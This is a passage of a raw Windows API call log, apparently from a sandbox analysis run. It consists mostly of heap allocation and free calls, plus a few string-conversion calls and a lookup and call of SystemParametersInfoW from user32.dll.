dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0243.661] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0243.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0243.661] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0243.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0243.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0243.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0243.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0243.664] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0243.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0243.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0243.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0243.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0243.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0243.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0243.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0243.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0243.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0243.669] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0243.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f71a0 [0243.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f71a0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0243.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0243.670] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0243.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0243.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0243.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0243.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0243.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.670] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0243.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0243.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0243.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0243.769] 